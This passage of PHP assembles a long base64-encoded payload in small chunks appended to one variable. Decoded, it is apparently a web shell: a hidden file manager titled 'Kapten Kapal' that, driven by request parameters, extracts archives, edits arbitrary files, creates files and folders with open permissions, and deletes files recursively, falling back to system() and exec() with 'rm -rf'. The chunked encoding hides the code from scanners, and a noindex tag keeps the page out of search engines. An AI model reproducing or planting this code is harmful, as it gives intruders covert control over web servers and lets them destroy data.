$z .= "wvYnV0dG9uPg0KICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgPGEgaHJlZj0iP1";
$z .= "9fZF9fPScgLiB1cmxlbmNvZGUoJF9f";
$z .= "ZGlyX18pIC4gJyIgc3R5bGU9ImNvbG";
$z .= "9yOiNjY2M7bWFyZ2luLWxlZnQ6MTBw";
$z .= "eDsiPkNhbmNlbDwvYT4NCiAgICAgIC";
$z .= "AgICAgICAgICAgICAgPC9mb3JtPg0K";
$z .= "ICAgICAgICAgICAgICAgICAgPC9kaX";
$z .= "Y+JzsNCiAgICAgICAgICAgIGV4aXQ7";
$z .= "DQogICAgICAgIH0NCiAgICB9DQp9DQ";
$z .= "oNCi8vIDUuIEVYVFJBQ1QgRVhJU1RJ";
$z .= "TkcgWklQIEZJTEUNCmlmIChpc3NldC";
$z .= "gkX0dFVFsnX19leHRyYWN0X18nXSkp";
$z .= "IHsNCiAgICAkX190YXJnZXRfXyA9IC";
$z .= "RfX2Rpcl9fIC4gJy8nIC4gYmFzZW5h";
$z .= "bWUoJF9HRVRbJ19fZXh0cmFjdF9fJ1";
$z .= "0pOw0KICAgIGlmIChmaWxlX2V4aXN0";
$z .= "cygkX190YXJnZXRfXykgJiYgY2xhc3";
$z .= "NfZXhpc3RzKCdaaXBBcmNoaXZlJykp";
$z .= "IHsNCiAgICAgICAgJF9femlwX18gPS";
$z .= "BuZXcgWmlwQXJjaGl2ZTsNCiAgICAg";
$z .= "ICAgaWYgKCRfX3ppcF9fLT5vcGVuKC";
$z .= "RfX3RhcmdldF9fKSA9PT0gVFJVRSkg";
$z .= "ew0KICAgICAgICAgICAgJF9femlwX1";
$z .= "8tPmV4dHJhY3RUbygkX19kaXJfXyk7";
$z .= "DQogICAgICAgICAgICAkX196aXBfXy";
$z .= "0+Y2xvc2UoKTsNCiAgICAgICAgICAg";
$z .= "IGVjaG8gJzxkaXYgc3R5bGU9ImJhY2";
$z .= "tncm91bmQ6cmdiYSgwLDAsMCwwLjgp";
$z .= "O2NvbG9yOmxpbWU7cGFkZGluZzoxMH";
$z .= "B4O21hcmdpbjoxMHB4O2JvcmRlci1y";
$z .= "YWRpdXM6NXB4O2JvcmRlci1sZWZ0Oj";
$z .= "RweCBzb2xpZCBvcmFuZ2U7Ij7inIUg";
$z .= "WklQIGV4dHJhY3RlZDogJyAuIGJhc2";
$z .= "VuYW1lKCRfX3RhcmdldF9fKSAuICc8";
$z .= "L2Rpdj4nOw0KICAgICAgICAgICAgZW";
$z .= "NobyAnPHNjcmlwdD5sb2NhdGlvbi5o";
$z .= "cmVmPSI/X19kX189JyAuIHVybGVuY2";
$z .= "9kZSgkX19kaXJfXykgLiAnIjs8L3Nj";
$z .= "cmlwdD4nOw0KICAgICAgICAgICAgZX";
$z .= "hpdDsNCiAgICAgICAgfSBlbHNlIHsN";
$z .= "CiAgICAgICAgICAgIGVjaG8gJzxkaX";
$z .= "Ygc3R5bGU9ImJhY2tncm91bmQ6cmdi";
$z .= "YSgwLDAsMCwwLjgpO2NvbG9yOiNmZj";
$z .= "U1NTU7cGFkZGluZzoxMHB4O21hcmdp";
$z .= "bjoxMHB4O2JvcmRlci1yYWRpdXM6NX";
$z .= "B4O2JvcmRlci1sZWZ0OjRweCBzb2xp";
$z .= "ZCByZWQ7Ij7inYwgRmFpbGVkIHRvIG";
$z .= "V4dHJhY3QgWklQIGZpbGU8L2Rpdj4n";
$z .= "Ow0KICAgICAgICB9DQogICAgfSBlbH";
$z .= "NlIHsNCiAgICAgICAgZWNobyAnPGRp";
$z .= "diBzdHlsZT0iYmFja2dyb3VuZDpyZ2";
$z .= "JhKDAsMCwwLDAuOCk7Y29sb3I6I2Zm";
$z .= "NTU1NTtwYWRkaW5nOjEwcHg7bWFyZ2";
$z .= "luOjEwcHg7Ym9yZGVyLXJhZGl1czo1";
$z .= "cHg7Ym9yZGVyLWxlZnQ6NHB4IHNvbG";
$z .= "lkIHJlZDsiPuKdjCBaSVAgZXh0ZW5z";
$z .= "aW9uIG5vdCBhdmFpbGFibGUgb3IgZm";
$z .= "lsZSBub3QgZm91bmQ8L2Rpdj4nOw0K";
$z .= "ICAgIH0NCn0NCg0KLy8gNy4gREVMRV";
$z .= "RFIEZJTEUvRk9MREVSIChZQU5HIFNV";
$z .= "REFIIERJUEVSQkFJS0kpDQppZiAoaX";
$z .= "NzZXQoJF9HRVRbJ19fZGVsX18nXSkp";
$z .= "IHsNCiAgICAkX190YXJnZXRfXyA9IC";
$z .= "RfX2Rpcl9fIC4gJy8nIC4gYmFzZW5h";
$z .= "bWUoJF9HRVRbJ19fZGVsX18nXSk7DQ";
$z .= "ogICAgaWYgKGZpbGVfZXhpc3RzKCRf";
$z .= "X3RhcmdldF9fKSkgew0KICAgICAgIC";
$z .= "AkX19zdWNjZXNzX18gPSBmYWxzZTsN";
$z .= "CiAgICAgICAgDQogICAgICAgIGlmIC";
$z .= "hpc19kaXIoJF9fdGFyZ2V0X18pKSB7";
$z .= "DQogICAgICAgICAgICAvLyBGdW5nc2";
$z .= "kgcmVrdXJzaWYgdW50dWsgaGFwdXMg";
$z .= "Zm9sZGVyDQogICAgICAgICAgICBmdW";
$z .= "5jdGlvbiBfX2RlbGV0ZV9mb2xkZXIo";
$z .= "JGRpcikgew0KICAgICAgICAgICAgIC";
$z .= "AgIGlmICghaXNfZGlyKCRkaXIpKSB7";
$z .= "DQogICAgICAgICAgICAgICAgICAgIH";
$z .= "JldHVybiB1bmxpbmsoJGRpcik7DQog";
$z .= "ICAgICAgICAgICAgICAgfQ0KICAgIC";
$z .= "AgICAgICAgICAgIA0KICAgICAgICAg";
$z .= "ICAgICAgICRmaWxlcyA9IGFycmF5X2";
$z .= "RpZmYoc2NhbmRpcigkZGlyKSwgYXJy";
$z .= "YXkoJy4nLCAnLi4nKSk7DQogICAgIC";
$z .= "AgICAgICAgICAgZm9yZWFjaCAoJGZp";
$z .= "bGVzIGFzICRmaWxlKSB7DQogICAgIC";
$z .= "AgICAgICAgICAgICAgICRwYXRoID0g";
$z .= "JGRpciAuICcvJyAuICRmaWxlOw0KIC";
$z .= "AgICAgICAgICAgICAgICAgICBpZiAo";
$z .= "aXNfZGlyKCRwYXRoKSkgew0KICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgX19k";
$z .= "ZWxldGVfZm9sZGVyKCRwYXRoKTsNCi";
$z .= "AgICAgICAgICAgICAgICAgICAgfSBl";
$z .= "bHNlIHsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgIEB1bmxpbmsoJHBhdGgp";
$z .= "Ow0KICAgICAgICAgICAgICAgICAgIC";
$z .= "B9DQogICAgICAgICAgICAgICAgfQ0K";
$z .= "ICAgICAgICAgICAgICAgIHJldHVybi";
$z .= "BAcm1kaXIoJGRpcik7DQogICAgICAg";
$z .= "ICAgICB9DQogICAgICAgICAgICANCi";
$z .= "AgICAgICAgICAgIC8vIENvYmEgaGFw";
$z .= "dXMgZGVuZ2FuIGZ1bmdzaSByZWt1cn";
$z .= "NpZiBkdWx1DQogICAgICAgICAgICAk";
$z .= "X19zdWNjZXNzX18gPSBfX2RlbGV0ZV";
$z .= "9mb2xkZXIoJF9fdGFyZ2V0X18pOw0K";
$z .= "ICAgICAgICAgICAgDQogICAgICAgIC";
$z .= "AgICAvLyBKaWthIGdhZ2FsLCBjb2Jh";
$z .= "IGRlbmdhbiBzeXN0ZW0gKGppa2EgYW";
$z .= "RhKQ0KICAgICAgICAgICAgaWYgKCEk";
$z .= "X19zdWNjZXNzX18pIHsNCiAgICAgIC";
$z .= "AgICAgICAgICBpZiAoZnVuY3Rpb25f";
$z .= "ZXhpc3RzKCdzeXN0ZW0nKSAmJiAhaW";
$z .= "5fYXJyYXkoJ3N5c3RlbScsIGV4cGxv";
$z .= "ZGUoJywnLCBpbmlfZ2V0KCdkaXNhYm";
$z .= "xlX2Z1bmN0aW9ucycpKSkpIHsNCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgaWYgKH";
$z .= "N0cnRvdXBwZXIoc3Vic3RyKFBIUF9P";
$z .= "UywgMCwgMykpID09PSAnV0lOJykgew";
$z .= "0KICAgICAgICAgICAgICAgICAgICAg";
$z .= "ICAgc3lzdGVtKCdybWRpciAvcyAvcS";
$z .= "AnIC4gZXNjYXBlc2hlbGxhcmcoJF9f";
$z .= "dGFyZ2V0X18pIC4gJyAyPiYxJywgJF";
$z .= "9fcmVzdWx0X18pOw0KICAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgJF9fc3VjY2";
$z .= "Vzc19fID0gKCRfX3Jlc3VsdF9fID09";
$z .= "PSAwKTsNCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgfSBlbHNlIHsNCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgICAgIHN5c3RlbS";
$z .= "gncm0gLXJmICcgLiBlc2NhcGVzaGVs";
$z .= "bGFyZygkX190YXJnZXRfXykgLiAnID";
$z .= "I+JjEnLCAkX19yZXN1bHRfXyk7DQog";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AkX19zdWNjZXNzX18gPSAoJF9fcmVz";
$z .= "dWx0X18gPT09IDApOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICB9DQogICAgICAg";
$z .= "ICAgICAgICAgfQ0KICAgICAgICAgIC";
$z .= "AgfQ0KICAgICAgICAgICAgDQogICAg";
$z .= "ICAgICAgICAvLyBDb2JhIGRlbmdhbi";
$z .= "BleGVjIGppa2EgbWFzaWggZ2FnYWwN";
$z .= "CiAgICAgICAgICAgIGlmICghJF9fc3";
$z .= "VjY2Vzc19fICYmIGZ1bmN0aW9uX2V4";
$z .= "aXN0cygnZXhlYycpICYmICFpbl9hcn";
$z .= "JheSgnZXhlYycsIGV4cGxvZGUoJywn";
$z .= "LCBpbmlfZ2V0KCdkaXNhYmxlX2Z1bm";
$z .= "N0aW9ucycpKSkpIHsNCiAgICAgICAg";
$z .= "ICAgICAgICBpZiAoc3RydG91cHBlci";
$z .= "hzdWJzdHIoUEhQX09TLCAwLCAzKSkg";
$z .= "PT09ICdXSU4nKSB7DQogICAgICAgIC";
$z .= "AgICAgICAgICAgIGV4ZWMoJ3JtZGly";
$z .= "IC9zIC9xICcgLiBlc2NhcGVzaGVsbG";
$z .= "FyZygkX190YXJnZXRfXykgLiAnIDI+";
$z .= "JjEnLCAkX19vdXRwdXRfXywgJF9fcm";
$z .= "VzdWx0X18pOw0KICAgICAgICAgICAg";
$z .= "ICAgICAgICAkX19zdWNjZXNzX18gPS";
$z .= "AoJF9fcmVzdWx0X18gPT09IDApOw0K";
$z .= "ICAgICAgICAgICAgICAgIH0gZWxzZS";
$z .= "B7DQogICAgICAgICAgICAgICAgICAg";
$z .= "IGV4ZWMoJ3JtIC1yZiAnIC4gZXNjYX";
$z .= "Blc2hlbGxhcmcoJF9fdGFyZ2V0X18p";
$z .= "IC4gJyAyPiYxJywgJF9fb3V0cHV0X1";
$z .= "8sICRfX3Jlc3VsdF9fKTsNCiAgICAg";
$z .= "ICAgICAgICAgICAgICAgJF9fc3VjY2";
$z .= "Vzc19fID0gKCRfX3Jlc3VsdF9fID09";
$z .= "PSAwKTsNCiAgICAgICAgICAgICAgIC";
$z .= "B9DQogICAgICAgICAgICB9DQogICAg";
$z .= "ICAgICAgICANCiAgICAgICAgfSBlbH";
$z .= "NlIHsNCiAgICAgICAgICAgIC8vIFVu";
$z .= "dHVrIGZpbGUNCiAgICAgICAgICAgIC";
$z .= "RfX3N1Y2Nlc3NfXyA9IEB1bmxpbmso";
$z .= "JF9fdGFyZ2V0X18pOw0KICAgICAgIC";
$z .= "AgICAgDQogICAgICAgICAgICAvLyBD";
$z .= "b2JhIGRlbmdhbiBzeXN0ZW0gamlrYS";
$z .= "B1bmxpbmsgZ2FnYWwNCiAgICAgICAg";
$z .= "ICAgIGlmICghJF9fc3VjY2Vzc19fIC";
$z .= "YmIGZ1bmN0aW9uX2V4aXN0cygnc3lz";
$z .= "dGVtJykgJiYgIWluX2FycmF5KCdzeX";
$z .= "N0ZW0nLCBleHBsb2RlKCcsJywgaW5p";
$z .= "X2dldCgnZGlzYWJsZV9mdW5jdGlvbn";
$z .= "MnKSkpKSB7DQogICAgICAgICAgICAg";
$z .= "ICAgaWYgKHN0cnRvdXBwZXIoc3Vic3";
$z .= "RyKFBIUF9PUywgMCwgMykpID09PSAn";
$z .= "V0lOJykgew0KICAgICAgICAgICAgIC";
$z .= "AgICAgICBzeXN0ZW0oJ2RlbCAvZiAv";
$z .= "cSAnIC4gZXNjYXBlc2hlbGxhcmcoJF";
$z .= "9fdGFyZ2V0X18pIC4gJyAyPiYxJywg";
$z .= "JF9fcmVzdWx0X18pOw0KICAgICAgIC";
$z .= "AgICAgICAgICAgICAkX19zdWNjZXNz";
$z .= "X18gPSAoJF9fcmVzdWx0X18gPT09ID";
$z .= "ApOw0KICAgICAgICAgICAgICAgIH0g";
$z .= "ZWxzZSB7DQogICAgICAgICAgICAgIC";
$z .= "AgICAgIHN5c3RlbSgncm0gLWYgJyAu";
$z .= "IGVzY2FwZXNoZWxsYXJnKCRfX3Rhcm";
$z .= "dldF9fKSAuICcgMj4mMScsICRfX3Jl";
$z .= "c3VsdF9fKTsNCiAgICAgICAgICAgIC";
$z .= "AgICAgICAgJF9fc3VjY2Vzc19fID0g";
$z .= "KCRfX3Jlc3VsdF9fID09PSAwKTsNCi";
$z .= "AgICAgICAgICAgICAgICB9DQogICAg";
$z .= "ICAgICAgICB9DQogICAgICAgIH0NCi";
$z .= "AgICAgICAgDQogICAgICAgIGlmICgk";
$z .= "X19zdWNjZXNzX18pIHsNCiAgICAgIC";
$z .= "AgICAgIGVjaG8gJzxzY3JpcHQ+YWxl";
$z .= "cnQoIuKchSBCZXJoYXNpbCBkaWhhcH";
$z .= "VzISIpOyBsb2NhdGlvbi5ocmVmPSI/";
$z .= "X19kX189JyAuIHVybGVuY29kZSgkX1";
$z .= "9kaXJfXykgLiAnIjs8L3NjcmlwdD4n";
$z .= "Ow0KICAgICAgICB9IGVsc2Ugew0KIC";
$z .= "AgICAgICAgICAgZWNobyAnPHNjcmlw";
$z .= "dD5hbGVydCgi4p2MIEdhZ2FsIG1lbm";
$z .= "doYXB1cyEgUGVyaWtzYSBwZXJtaXNz";
$z .= "aW9uIGZvbGRlci4iKTsgbG9jYXRpb2";
$z .= "4uaHJlZj0iP19fZF9fPScgLiB1cmxl";
$z .= "bmNvZGUoJF9fZGlyX18pIC4gJyI7PC";
$z .= "9zY3JpcHQ+JzsNCiAgICAgICAgfQ0K";
$z .= "ICAgICAgICBleGl0Ow0KICAgIH0NCn";
$z .= "0NCg0KLy8gOC4gRURJVCBGSUxFDQpp";
$z .= "ZiAoaXNzZXQoJF9HRVRbJ19fZWRpdF";
$z .= "9fJ10pKSB7DQogICAgJF9fdGFyZ2V0";
$z .= "X18gPSAkX19kaXJfXyAuICcvJyAuIG";
$z .= "Jhc2VuYW1lKCRfR0VUWydfX2VkaXRf";
$z .= "XyddKTsNCiAgICBpZiAoZmlsZV9leG";
$z .= "lzdHMoJF9fdGFyZ2V0X18pICYmIGlz";
$z .= "X2ZpbGUoJF9fdGFyZ2V0X18pKSB7DQ";
$z .= "ogICAgICAgIGlmIChpc3NldCgkX1BP";
$z .= "U1RbJ19fY29udGVudF9fJ10pKSB7DQ";
$z .= "ogICAgICAgICAgICBmaWxlX3B1dF9j";
$z .= "b250ZW50cygkX190YXJnZXRfXywgJF";
$z .= "9QT1NUWydfX2NvbnRlbnRfXyddKTsN";
$z .= "CiAgICAgICAgICAgIGVjaG8gJzxkaX";
$z .= "Ygc3R5bGU9ImJhY2tncm91bmQ6cmdi";
$z .= "YSgwLDAsMCwwLjgpO2NvbG9yOmxpbW";
$z .= "U7cGFkZGluZzoxMHB4O21hcmdpbjox";
$z .= "MHB4O2JvcmRlci1yYWRpdXM6NXB4O2";
$z .= "JvcmRlci1sZWZ0OjRweCBzb2xpZCBs";
$z .= "aW1lOyI+4pyFIEZpbGUgc2F2ZWQhPC";
$z .= "9kaXY+JzsNCiAgICAgICAgICAgIGVj";
$z .= "aG8gJzxzY3JpcHQ+bG9jYXRpb24uaH";
$z .= "JlZj0iP19fZF9fPScgLiB1cmxlbmNv";
$z .= "ZGUoJF9fZGlyX18pIC4gJyI7PC9zY3";
$z .= "JpcHQ+JzsNCiAgICAgICAgICAgIGV4";
$z .= "aXQ7DQogICAgICAgIH0NCiAgICAgIC";
$z .= "AgJF9fY29udGVudF9fID0gaHRtbHNw";
$z .= "ZWNpYWxjaGFycyhmaWxlX2dldF9jb2";
$z .= "50ZW50cygkX190YXJnZXRfXykpOw0K";
$z .= "ICAgICAgICBlY2hvICc8ZGl2IHN0eW";
$z .= "xlPSJiYWNrZ3JvdW5kOnJnYmEoMCww";
$z .= "LDAsMC45NSk7cGFkZGluZzoyMHB4O2";
$z .= "1hcmdpbjoyMHB4O2JvcmRlci1yYWRp";
$z .= "dXM6MTBweDtib3JkZXI6MnB4IHNvbG";
$z .= "lkICMwZjA7Ij4NCiAgICAgICAgICAg";
$z .= "ICAgICA8aDMgc3R5bGU9ImNvbG9yOi";
$z .= "MwZjA7bWFyZ2luLXRvcDowOyI+8J+T";
$z .= "nSBFRElUOiAnIC4gYmFzZW5hbWUoJF";
$z .= "9fdGFyZ2V0X18pIC4gJzwvaDM+DQog";
$z .= "ICAgICAgICAgICAgICAgPGZvcm0gbW";
$z .= "V0aG9kPSJwb3N0Ij4NCiAgICAgICAg";
$z .= "ICAgICAgICAgICAgPHRleHRhcmVhIG";
$z .= "5hbWU9Il9fY29udGVudF9fIiBzdHls";
$z .= "ZT0id2lkdGg6MTAwJTtoZWlnaHQ6ND";
$z .= "AwcHg7YmFja2dyb3VuZDojMTExO2Nv";
$z .= "bG9yOiMwZjA7Ym9yZGVyOjFweCBzb2";
$z .= "xpZCAjNTU1O3BhZGRpbmc6MTBweDtm";
$z .= "b250LWZhbWlseTptb25vc3BhY2U7Ij";
$z .= "4nIC4gJF9fY29udGVudF9fIC4gJzwv";
$z .= "dGV4dGFyZWE+DQogICAgICAgICAgIC";
$z .= "AgICAgICAgIDxicj48YnI+DQogICAg";
$z .= "ICAgICAgICAgICAgICAgIDxidXR0b2";
$z .= "4gdHlwZT0ic3VibWl0IiBzdHlsZT0i";
$z .= "YmFja2dyb3VuZDojMGYwO2NvbG9yOi";
$z .= "MwMDA7cGFkZGluZzoxMHB4IDIwcHg7";
$z .= "Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZG";
$z .= "l1czo1cHg7Y3Vyc29yOnBvaW50ZXI7";
$z .= "Zm9udC13ZWlnaHQ6Ym9sZDsiPlNhdm";
$z .= "U8L2J1dHRvbj4NCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgPGEgaHJlZj0iP19fZF";
$z .= "9fPScgLiB1cmxlbmNvZGUoJF9fZGly";
$z .= "X18pIC4gJyIgc3R5bGU9ImNvbG9yOi";
$z .= "NjY2M7bWFyZ2luLWxlZnQ6MTBweDsi";
$z .= "PkNhbmNlbDwvYT4NCiAgICAgICAgIC";
$z .= "AgICAgICA8L2Zvcm0+DQogICAgICAg";
$z .= "ICAgICAgIDwvZGl2Pic7DQogICAgIC";
$z .= "AgIGV4aXQ7DQogICAgfQ0KfQ0KDQov";
$z .= "LyA5LiBDUkVBVEUgRklMRS9GT0xERV";
$z .= "INCmlmIChpc3NldCgkX1BPU1RbJ19f";
$z .= "Y3JlYXRlX18nXSkpIHsNCiAgICAkX1";
$z .= "9uYW1lX18gPSAkX1BPU1RbJ19fbmFt";
$z .= "ZV9fJ107DQogICAgJF9fdHlwZV9fID";
$z .= "0gJF9QT1NUWydfX3R5cGVfXyddOw0K";
$z .= "ICAgICRfX3BhdGhfXyA9ICRfX2Rpcl";
$z .= "9fIC4gJy8nIC4gJF9fbmFtZV9fOw0K";
$z .= "ICAgIA0KICAgIGlmICgkX190eXBlX1";
$z .= "8gPT09ICdmaWxlJykgew0KICAgICAg";
$z .= "ICBpZiAoZmlsZV9wdXRfY29udGVudH";
$z .= "MoJF9fcGF0aF9fLCAkX1BPU1RbJ19f";
$z .= "ZGF0YV9fJ10gPz8gJycpKSB7DQogIC";
$z .= "AgICAgICAgICBlY2hvICc8ZGl2IHN0";
$z .= "eWxlPSJiYWNrZ3JvdW5kOnJnYmEoMC";
$z .= "wwLDAsMC44KTtjb2xvcjpsaW1lO3Bh";
$z .= "ZGRpbmc6MTBweDttYXJnaW46MTBweD";
$z .= "tib3JkZXItcmFkaXVzOjVweDtib3Jk";
$z .= "ZXItbGVmdDo0cHggc29saWQgbGltZT";
$z .= "siPuKchSBGaWxlIGNyZWF0ZWQ6ICcg";
$z .= "LiAkX19uYW1lX18gLiAnPC9kaXY+Jz";
$z .= "sNCiAgICAgICAgfSBlbHNlIHsNCiAg";
$z .= "ICAgICAgICAgIGVjaG8gJzxkaXYgc3";
$z .= "R5bGU9ImJhY2tncm91bmQ6cmdiYSgw";
$z .= "LDAsMCwwLjgpO2NvbG9yOiNmZjU1NT";
$z .= "U7cGFkZGluZzoxMHB4O21hcmdpbjox";
$z .= "MHB4O2JvcmRlci1yYWRpdXM6NXB4O2";
$z .= "JvcmRlci1sZWZ0OjRweCBzb2xpZCBy";
$z .= "ZWQ7Ij7inYwgR2FnYWwgbWVtYnVhdC";
$z .= "BmaWxlPC9kaXY+JzsNCiAgICAgICAg";
$z .= "fQ0KICAgIH0gZWxzZSB7DQogICAgIC";
$z .= "AgIGlmIChta2RpcigkX19wYXRoX18s";
$z .= "IDA3NzcsIHRydWUpKSB7DQogICAgIC";
$z .= "AgICAgICBlY2hvICc8ZGl2IHN0eWxl";
$z .= "PSJiYWNrZ3JvdW5kOnJnYmEoMCwwLD";
$z .= "AsMC44KTtjb2xvcjpsaW1lO3BhZGRp";
$z .= "bmc6MTBweDttYXJnaW46MTBweDtib3";
$z .= "JkZXItcmFkaXVzOjVweDtib3JkZXIt";
$z .= "bGVmdDo0cHggc29saWQgbGltZTsiPu";
$z .= "KchSBGb2xkZXIgY3JlYXRlZDogJyAu";
$z .= "ICRfX25hbWVfXyAuICc8L2Rpdj4nOw";
$z .= "0KICAgICAgICB9IGVsc2Ugew0KICAg";
$z .= "ICAgICAgICAgZWNobyAnPGRpdiBzdH";
$z .= "lsZT0iYmFja2dyb3VuZDpyZ2JhKDAs";
$z .= "MCwwLDAuOCk7Y29sb3I6I2ZmNTU1NT";
$z .= "twYWRkaW5nOjEwcHg7bWFyZ2luOjEw";
$z .= "cHg7Ym9yZGVyLXJhZGl1czo1cHg7Ym";
$z .= "9yZGVyLWxlZnQ6NHB4IHNvbGlkIHJl";
$z .= "ZDsiPuKdjCBHYWdhbCBtZW1idWF0IG";
$z .= "ZvbGRlcjwvZGl2Pic7DQogICAgICAg";
$z .= "IH0NCiAgICB9DQp9DQoNCi8vID09PT";
$z .= "09PT09PT09PT09PT09PT09IEhFTFBF";
$z .= "UiBGVU5DVElPTlMgPT09PT09PT09PT";
$z .= "09PT09PT09PT0NCmZ1bmN0aW9uIF9f";
$z .= "Zm9ybWF0X3NpemUoJGJ5dGVzKSB7DQ";
$z .= "ogICAgaWYgKCRieXRlcyA+PSAxMDcz";
$z .= "NzQxODI0KSByZXR1cm4gbnVtYmVyX2";
$z .= "Zvcm1hdCgkYnl0ZXMgLyAxMDczNzQx";
$z .= "ODI0LCAyKSAuICcgR0InOw0KICAgIG";
$z .= "lmICgkYnl0ZXMgPj0gMTA0ODU3Nikg";
$z .= "cmV0dXJuIG51bWJlcl9mb3JtYXQoJG";
$z .= "J5dGVzIC8gMTA0ODU3NiwgMikgLiAn";
$z .= "IE1CJzsNCiAgICBpZiAoJGJ5dGVzID";
$z .= "49IDEwMjQpIHJldHVybiBudW1iZXJf";
$z .= "Zm9ybWF0KCRieXRlcyAvIDEwMjQsID";
$z .= "IpIC4gJyBLQic7DQogICAgcmV0dXJu";
$z .= "ICRieXRlcyAuICcgQic7DQp9DQoNCm";
$z .= "Z1bmN0aW9uIF9fZ2V0X3Blcm0oJGZp";
$z .= "bGUpIHsNCiAgICAkcGVybSA9IGZpbG";
$z .= "VwZXJtcygkZmlsZSk7DQogICAgJGlu";
$z .= "Zm8gPSAnJzsNCiAgICAkaW5mbyAuPS";
$z .= "AoKCRwZXJtICYgMHg0MDAwKSA/ICdk";
$z .= "JyA6ICctJyk7DQogICAgJGluZm8gLj";
$z .= "0gKCgkcGVybSAmIDB4MDEwMCkgPyAn";
$z .= "cicgOiAnLScpOw0KICAgICRpbmZvIC";
$z .= "49ICgoJHBlcm0gJiAweDAwODApID8g";
$z .= "J3cnIDogJy0nKTsNCiAgICAkaW5mby";
$z .= "AuPSAoKCRwZXJtICYgMHgwMDQwKSA/";
$z .= "ICd4JyA6ICctJyk7DQogICAgJGluZm";
$z .= "8gLj0gKCgkcGVybSAmIDB4MDAyMCkg";
$z .= "PyAncicgOiAnLScpOw0KICAgICRpbm";
$z .= "ZvIC49ICgoJHBlcm0gJiAweDAwMTAp";
$z .= "ID8gJ3cnIDogJy0nKTsNCiAgICAkaW";
$z .= "5mbyAuPSAoKCRwZXJtICYgMHgwMDA4";
$z .= "KSA/ICd4JyA6ICctJyk7DQogICAgJG";
$z .= "luZm8gLj0gKCgkcGVybSAmIDB4MDAw";
$z .= "NCkgPyAncicgOiAnLScpOw0KICAgIC";
$z .= "RpbmZvIC49ICgoJHBlcm0gJiAweDAw";
$z .= "MDIpID8gJ3cnIDogJy0nKTsNCiAgIC";
$z .= "AkaW5mbyAuPSAoKCRwZXJtICYgMHgw";
$z .= "MDAxKSA/ICd4JyA6ICctJyk7DQogIC";
$z .= "AgcmV0dXJuICRpbmZvOw0KfQ0KDQpm";
$z .= "dW5jdGlvbiBfX3Blcm1fY29sb3IoJH";
$z .= "Blcm0sICRpc193cml0YWJsZSkgew0K";
$z .= "ICAgIGlmICgkaXNfd3JpdGFibGUpIH";
$z .= "sNCiAgICAgICAgcmV0dXJuICcjMDBm";
$z .= "ZjAwJzsgLy8gSElKQVUgLSBCaXNhIG";
$z .= "RpYWtzZXMvZGl0dWxpcw0KICAgIH0g";
$z .= "ZWxzZSB7DQogICAgICAgIHJldHVybi";
$z .= "AnI2ZmZmZmZic7IC8vIFBVVElIIC0g";
$z .= "VGlkYWsgYmlzYSBkaWFrc2VzL2RpdH";
$z .= "VsaXMNCiAgICB9DQp9DQoNCmZ1bmN0";
$z .= "aW9uIF9faXNfd3JpdGFibGUoJGZpbG";
$z .= "UpIHsNCiAgICByZXR1cm4gaXNfd3Jp";
$z .= "dGFibGUoJGZpbGUpOw0KfQ0KDQovLy";
$z .= "A9PT09PT09PT09PT09PT09PT09PSBI";
$z .= "VE1MIE9VVFBVVCA9PT09PT09PT09PT";
$z .= "09PT09PT09PQ0KPz4NCjwhRE9DVFlQ";
$z .= "RSBodG1sPg0KPGh0bWw+DQo8aGVhZD";
$z .= "4NCiAgICA8dGl0bGU+8J+agCBLYXB0";
$z .= "ZW4gS2FwYWw8L3RpdGxlPg0KICAgID";
$z .= "xtZXRhIG5hbWU9InJvYm90cyIgY29u";
$z .= "dGVudD0ibm9pbmRleCxub2ZvbGxvdy";
$z .= "I+DQogICAgPG1ldGEgbmFtZT0idmll";
$z .= "d3BvcnQiIGNvbnRlbnQ9IndpZHRoPW";
$z .= "RldmljZS13aWR0aCwgaW5pdGlhbC1z";
$z .= "Y2FsZT0xLjAiPg0KICAgIDxzdHlsZT";
$z .= "4NCiAgICAgICAgOnJvb3Qgew0KICAg";
$z .= "ICAgICAgICAgLS1iZy1kYXJrOiAjMG";
$z .= "EwYTBhOw0KICAgICAgICAgICAgLS1i";
$z .= "Zy1jYXJkOiByZ2JhKDAsIDAsIDAsID";
$z .= "AuNSk7DQogICAgICAgICAgICAtLXRl";
$z .= "eHQtcHJpbWFyeTogIzAwZmYwMDsNCi";
$z .= "AgICAgICAgICAgIC0tdGV4dC1zZWNv";
$z .= "bmRhcnk6ICNjY2NjY2M7DQogICAgIC";
$z .= "AgICAgICAtLWFjY2VudC1nb2xkOiAj";
$z .= "RkZENzAwOw0KICAgICAgICAgICAgLS";
$z .= "1hY2NlbnQtcmVkOiAjZmYxNDE0Ow0K";
$z .= "ICAgICAgICAgICAgLS1hY2NlbnQtYm";
$z .= "x1ZTogIzAwQkZGRjsNCiAgICAgICAg";
$z .= "ICAgIC0tYWNjZW50LWN5YW46ICMwMG";
$z .= "ZmZmY7DQogICAgICAgICAgICAtLWFj";
$z .= "Y2VudC1tYWdlbnRhOiAjRkYwMEZGOw";
$z .= "0KICAgICAgICAgICAgLS1ib3JkZXIt";
$z .= "Y29sb3I6IHJnYmEoMjU1LCAyMTUsID";
$z .= "AsIDAuMyk7DQogICAgICAgIH0NCiAg";
$z .= "ICAgICAgDQogICAgICAgICogew0KIC";
$z .= "AgICAgICAgICAgbWFyZ2luOiAwOw0K";
$z .= "ICAgICAgICAgICAgcGFkZGluZzogMD";
$z .= "sNCiAgICAgICAgICAgIGJveC1zaXpp";
$z .= "bmc6IGJvcmRlci1ib3g7DQogICAgIC";
$z .= "AgIH0NCiAgICAgICAgDQogICAgICAg";
$z .= "IGJvZHkgew0KICAgICAgICAgICAgZm";
$z .= "9udC1mYW1pbHk6ICdDb3VyaWVyIE5l";
$z .= "dycsIG1vbm9zcGFjZTsNCiAgICAgIC";
$z .= "AgICAgIGJhY2tncm91bmQ6IGxpbmVh";
$z .= "ci1ncmFkaWVudChyZ2JhKDAsMCwwLD";
$z .= "AuMSksIHJnYmEoMCwwLDAsMC4yKSks";
$z .= "IA0KICAgICAgICAgICAgICAgICAgIC";
